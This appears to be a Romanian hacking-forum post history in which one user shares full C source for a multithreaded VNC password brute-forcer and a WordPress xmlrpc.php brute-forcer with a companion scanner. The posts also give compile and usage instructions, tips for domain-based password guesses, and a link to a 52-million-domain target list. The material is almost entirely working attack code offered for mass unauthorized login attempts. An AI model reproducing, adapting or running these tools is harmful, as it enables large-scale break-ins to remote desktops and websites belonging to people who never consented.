sssmoke
-
Posts
4 -
Joined
-
Last visited
Everything posted by sssmoke
-
Am vrut sa fac un brute de vncuri, fiindca din cate am vazut pe net, n-am gasit nici unul foarte rapid. Folosirea e simpla, aveti nevoie de openssl instalat si il compilati cu gcc -o vnc vnc.c -lcrypto -lpthread. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <openssl/des.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <signal.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <pthread.h> #include <ctype.h> #define RED "\E[1;32;31m" #define GREEN "\E[1;32;40m" #define WHITE "\E[1;37;40m" #define NORMAL "\E[m" #define CLEARLN "\033[F\033[J" #define CONNECT_TIMEOUT 2 #define READ_TIMEOUT 5 #define LOCK(x) pthread_mutex_lock(&x); #define UNLOCK(x) pthread_mutex_unlock(&x); static int maxqueue = 0; static int brutemode = 0; struct host_queue{ char * host; char * pass; struct host_queue * next; }; struct combi { char * host; char * pass; }; static time_t start, lmin; static FILE *ipfile = NULL; static FILE *outfile = NULL; static FILE *passfile = NULL; static int finished = 0; static int done = 0; static int good = 0; static int total = 0; static long qsize = 0; static long lastmin = 0; static int dmin = 0; static struct host_queue * jobs = NULL; static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER; static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER; static void usage(const char *s) { printf(RED"Usage: %s <check|brute>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_check(const char *s) { printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_brute(const char *s) { printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void save_no_auth(const char *host) { FILE *noauth = fopen("no.auth", "a+"); fprintf(noauth, "%s\n", host); fclose(noauth); } static void save_vnc_list(const char *host) { FILE *vnclist= fopen("vnc.list", "a+"); fprintf(vnclist, "%s\n", host); fclose(vnclist); } static void queue_job(char *h, char *p) { struct host_queue * hq = (struct host_queue *) malloc(sizeof(struct host_queue)); hq->host = h; hq->pass = p; hq->next = NULL; LOCK(job_lock); while(qsize >= maxqueue) pthread_cond_wait(&job_size_cond, &job_lock); if(jobs == NULL) jobs = hq; else { hq->next = jobs; jobs = hq; } ++qsize; pthread_cond_signal(&job_cond); UNLOCK(job_lock); } static struct combi * dequeue_job(void){ struct combi * trynow = (struct combi *) malloc(sizeof(struct combi)); LOCK(job_lock); while(jobs == NULL){ LOCK(stat_lock); if(done == 1){ UNLOCK(stat_lock); UNLOCK(job_lock); free(trynow); return NULL; } UNLOCK(stat_lock); pthread_cond_wait(&job_cond, &job_lock); } trynow->host = jobs->host; trynow->pass = jobs->pass; struct host_queue * hq = jobs; jobs = jobs->next; --qsize; pthread_cond_signal(&job_size_cond); UNLOCK(job_lock); free(hq); return trynow; } static int send_msg(int sockfd, char *message) { int n; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, NULL, &rset, NULL, &timeout); if (n < 0) return -1; else if (n == 0) return -1; else n = send(sockfd, message, strlen(message), MSG_NOSIGNAL); return n; } static int recv_msg(int sockfd, char **retmes) { int n; char *buffer = (char *) malloc(512); bzero(buffer, 512); *retmes = NULL; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, &rset, NULL, NULL, &timeout); if(n <= 0) { free(buffer); return 0; } else n = read(sockfd, buffer, 511); *retmes = buffer; return n; } static char *Encrypt(char *Key, char *Msg, int size, char **dest) { char *Res = NULL; int n=0; DES_cblock Key2, decry, plain1, plain2, result1, result2; DES_key_schedule schedule; Res = (char *) malloc(size + 1); bzero(Res, size + 1); memcpy(Key2, Key, 8); memcpy(plain1, Msg, 8); memcpy(plain2, Msg + 8, 8); DES_set_odd_parity( &Key2 ); DES_set_key(&Key2, &schedule ); DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT); DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT); memcpy(Res, result1, 8); memcpy(Res + 8, result2, 8); *dest = Res; return NULL; } static int checknow(const char *host, const char *pass) { int sockfd, rc, i, n = 0, tmax = 0; long arg; unsigned char newkey[8]; bzero(newkey, 8); for (i=0;i<strlen(pass);i++) { int a = pass[i]; int b = 0; int j; for (j=0; j<8; j++) if (a & (1<<j)) b = b | (1<<7-j); unsigned char d = b; newkey[i] = d; } newkey[i] = '\0'; struct sockaddr_in remoteaddr; remoteaddr.sin_family = AF_INET; remoteaddr.sin_addr.s_addr = inet_addr(host); remoteaddr.sin_port = htons(5900); retry: sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) goto retry; struct linger so_linger; so_linger.l_onoff = 1; so_linger.l_linger = 0; struct timeval tv; int valopt; tv.tv_sec = CONNECT_TIMEOUT; tv.tv_usec = 0; if(setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } char *recbuf = NULL; if (connect(sockfd, (struct sockaddr *)&remoteaddr, sizeof(remoteaddr)) < 0) { if (errno == EINPROGRESS) { fd_set write_fds; memset(&write_fds, 0, sizeof(write_fds)); FD_ZERO(&write_fds); FD_SET(sockfd, &write_fds); if (select(sockfd+1, NULL, &write_fds, NULL, &tv) > 0) { socklen_t lon; lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) goto first; } else goto first; } else goto first; } n = recv_msg(sockfd, &recbuf); if(n == 0 || !strstr(recbuf, "RFB 00") || n > 12) goto first; char *proto = malloc(13 * sizeof(char)); bzero(proto, 13); if((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1')) sprintf(proto, "RFB 003.008\n"); else if(recbuf[6] == '3' && recbuf[10] == '7') sprintf(proto, "RFB 003.007\n"); else sprintf(proto, "RFB 003.003\n"); if(send_msg(sockfd, proto) < 0) { free(proto); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n == 0) { free(proto); goto first; } unsigned char *response = malloc(17 * sizeof(char)); bzero(response, 17); int code; if(proto[10] == '7' || proto[10] == '8') { free(proto); int numberauth = recbuf[0], auth_supported = 0; for(i=1; i<numberauth + 1; i++) { if(recbuf[i] == 1) save_no_auth(host); else if(recbuf[i] == 2) auth_supported = 1; } if(auth_supported == 0) { free(response); goto first; } if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); tmax = 3; free(response); goto first; } char authchar[1]; authchar[0] = '\x02'; if(send_msg(sockfd, authchar) < 0) { free(response); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n != 16) { free(response); goto first; } memcpy(response, recbuf, 16); } else { free(proto); code = recbuf[3]; if(code == 1) { save_no_auth(host); free(response); goto first; } else if(code == 2 && n >= 20) { if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); free(response); tmax = 3; goto first; } memcpy(response, recbuf + n - 16, 16); } else { free(response); goto first; } } char *encrypted = NULL; Encrypt(newkey, response, 16, &encrypted); free(response); free(recbuf); if(send_msg(sockfd, encrypted) < 0) { free(encrypted); goto first; } free(encrypted); n = recv_msg(sockfd, &recbuf); if(n != 4) goto first; code = recbuf[3]; long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); if(code == 0) { LOCK(stat_lock); printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass); FILE *logfile = fopen("vnc.good", "a+"); fprintf(logfile, "%s %s\n", host, pass); fclose(logfile); UNLOCK(stat_lock); } first: LOCK(stat_lock); dmin++; finished++; UNLOCK(stat_lock); free(recbuf); close(sockfd); return -1; } static void *worker_thread(void *worker) { while(1) { struct combi *trynow = dequeue_job(); if(trynow == NULL) break; char *host = NULL, *pass = NULL; host = trynow->host; pass = trynow->pass; if(host == NULL || pass == NULL) break; checknow(host, pass); free(trynow); free(host); if(brutemode == 2) free(pass); } pthread_exit(NULL); } int main(int argc, char **argv) { char ip[32] = {0}, pass[32] = {0}; if (argc < 2) usage(argv[0]); if ((strcmp(argv[1], "check") == 0) && (argc != 4)) usage_check(argv[0]); else if((strcmp(argv[1], "brute") == 0) && (argc != 5)) usage_brute(argv[0]); else if(strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0) usage(argv[0]); if (strcmp(argv[1], "check") == 0) brutemode = 1; else if(strcmp(argv[1], "brute") == 0) brutemode = 2; int num_threads; char *list_host = NULL, *list_pass = NULL; if (brutemode == 1) { list_host = argv[2]; num_threads = atoi(argv[3]); } else { list_host = argv[2]; list_pass = argv[3]; num_threads = atoi(argv[4]); } maxqueue = num_threads; if(brutemode == 2) printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads); else printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads); start = time(0); lmin = time(0); if(!(ipfile = fopen(list_host, "r"))) { printf("INVALID IP FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); char **passwords; int pcount=0; if(brutemode == 2) { if(!(passfile = fopen(list_pass, "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) pcount++; } fclose(passfile); passwords = malloc(pcount * sizeof(char*)); pcount = 0; passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) { passwords[pcount] = malloc((strlen(pass)+1)*sizeof(char)); strcpy(passwords[pcount], pass); pcount++; } } fclose(passfile); } int i; pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t)*num_threads); pthread_attr_t attrs; pthread_attr_init(&attrs); pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED); for(i=0; i<num_threads; i++) { pthread_create(&thread[i], &attrs, worker_thread, NULL); pthread_detach(thread[i]); } if(brutemode == 1) { ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); strcpy(host, ip); queue_job(host, "checkmod"); } } fclose(ipfile); } else { int pc=0; for(pc=0; pc<pcount; pc++) { printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]); ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); char *pass = (char *)malloc(strlen(passwords[pc]) + 1); strcpy(host, ip); strcpy(pass, passwords[pc]); queue_job(host, pass); } } fclose(ipfile); } } done=1; for(i=0; i < num_threads; i++) pthread_cond_signal(&job_cond); pthread_mutex_destroy(&job_lock); pthread_cond_destroy(&job_cond); sleep(20); free(thread); exit(0); } Daca aveti lista de ipuri si vreti doar sa verificati care au VNC si suporta autentificare dati: ./vnc check listaipuri numarthreaduri Daca doriti sa faceti bruteforce direct: ./vnc brute listaipuri listaparole numarthreaduri Daca gasiti vreun bug sau aveti sugestii de imbunatatire lasati mesaj
- 1 reply
-
- 1
-
-
La parola poti folosi DOMAIN% sau DOMAIN%123 din astea asa si iti inlocuieste domeniul ex: Google cu google sau google123 cum vrei tu. La useri singurul fel care cred eu ca merge updatat e sa ia userul din pagina ?author=1 ca ala e admin, alti useri nu stiu cat de mult conteaza...
-
Aici aveti si o lista de 52mil domenii sa nu va plictisiti gangsta.club/xdom.txt
-
Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php. ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } else { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=0;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } } if(!strstr(processed, ip)) { if(!(fork())) { getvuln(ip,user,pass2,outfile,link); exit(0); } else { numforks++; if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL); } } } } fclose(ipfile); } } fclose(passfile); } } fclose(userfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } ===== checker.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *link, FILE *outfile); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE SMTP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <IPs file> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *link, FILE *outfile) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[2048], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55"); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd, buffer, 2047); if (n < 0) { exit(1); } if(strstr(buffer, "<int>403</int>")) { printf("[+]Found: %s - %s\n", victim, link); fprintf(outfile, "%s %s\n", victim, link); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char ip[1024]; time_t start; if (argc < 2) usage(argv[0]); outfile = fopen("out.log", "a+"); printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0'; if (ip) { if(!(fork())) { getvuln(ip,"/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } if(!(fork())) { getvuln(ip,"/blog/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } } } fclose(ipfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } Pentru compilare: gcc -o checker checker.c gcc -o brute brute.c Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log. Usage: ./checker <IPs file> <threads> Pentru a incepe brute faceti o lista de useri, una de parole si porniti: ./brute out.log users.txt passwords.txt <threads> Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400. Astept sugestii